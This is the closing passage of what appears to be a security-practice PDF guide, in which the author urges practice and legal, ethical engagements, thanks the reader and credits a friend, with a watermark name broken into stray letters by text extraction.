
curve is therefore perpetual. Keep that curiosity ignited, sharpen your skills with
ad

relentless practice, and always operate with unwavering integrity and within the legal
boundaries of your engagements.
e
By

Thank you for reading. I hope this helps you, buddy. This is one of my favorite
KA

pieces and the first I've converted to a PDF. The idea for this came from my best
friend and constant supporter, Eng/Omar Sherif. Thank you, my friend, for
R

everything.
IM
AS
H
R
AF